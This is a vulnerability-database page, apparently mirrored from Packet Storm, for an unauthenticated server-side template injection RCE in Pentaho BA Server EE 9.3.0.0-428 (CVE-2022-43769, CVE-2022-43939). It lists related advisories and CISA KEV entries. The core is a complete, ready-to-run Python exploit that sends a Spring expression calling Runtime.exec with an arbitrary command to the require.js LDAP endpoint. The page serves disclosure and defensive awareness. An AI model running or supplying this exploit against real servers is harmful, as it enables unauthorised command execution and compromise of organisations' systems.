Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution

🗓️ 05 Apr 2023 00:00:00Reported by dwbznType

packetstorm🔗 packetstormsecurity.com👁 252 Views

Pentaho BA Server EE 9.3.0.0-428 RCE via SSTI (Unauthenticated

Reporter	Title	Published	Views	Family All 38
0day.today	Pentaho BA Server EE 9.3.0.0-428 Server-Side Template Injection / Remote Code Execution	5 Apr 202300:00	–	zdt
ATTACKERKB	CVE-2022-43769	3 Apr 202300:00	–	attackerkb
ATTACKERKB	CVE-2022-43939	3 Apr 202300:00	–	attackerkb
BDU FSTEC	The vulnerability of Hitachi Vantara Pentaho Business Analytics Server’s server lies in the improper elimination of certain elements in the output data, allowing attackers to execute arbitrary commands.	4 Apr 202300:00	–	bdu_fstec
BDU FSTEC	The vulnerability of Hitachi Vantara Pentaho Business Analytics Server lies in the use of non-standard URL paths for authentication solutions. This allows attackers to escalate their privileges.	12 Apr 202300:00	–	bdu_fstec
Circl	CVE-2022-43769	3 Apr 202322:25	–	circl
Circl	CVE-2022-43939	3 Apr 202322:24	–	circl
CISA KEV Catalog	Hitachi Vantara Pentaho BA Server Special Element Injection Vulnerability	3 Mar 202500:00	–	cisa_kev
CISA KEV Catalog	Hitachi Vantara Pentaho BA Server Authorization Bypass Vulnerability	3 Mar 202500:00	–	cisa_kev
CISA	CISA Adds Five Known Exploited Vulnerabilities to Catalog	3 Mar 202512:00	–	cisa

`# Title: Pentaho BA Server EE 9.3.0.0-428 - RCE via Server-Side Template Injection (Unauthenticated)  
# Author: dwbzn  
# Date: 2022-04-04  
# Vendor: https://www.hitachivantara.com/  
# Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html  
# Version: Pentaho BA Server 9.3.0.0-428  
# CVE: CVE-2022-43769, CVE-2022-43939  
# Tested on: Windows 11  
# Credits: https://research.aurainfosec.io/pentest/pentah0wnage  
# NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).  
  
# Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)  
import requests  
import argparse  
  
parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')  
parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')  
parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)  
args = parser.parse_args()  
  
url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"  
  
print ("running...")  
r = requests.get(url)  
if r.text == 'false':  
print ("command should've executed! nice.")  
else:  
print ("didn't work. sadge...")  
`

05 Apr 2023 00:00Current

8.4High risk

Vulners AI Score8.4

EPSS0.93976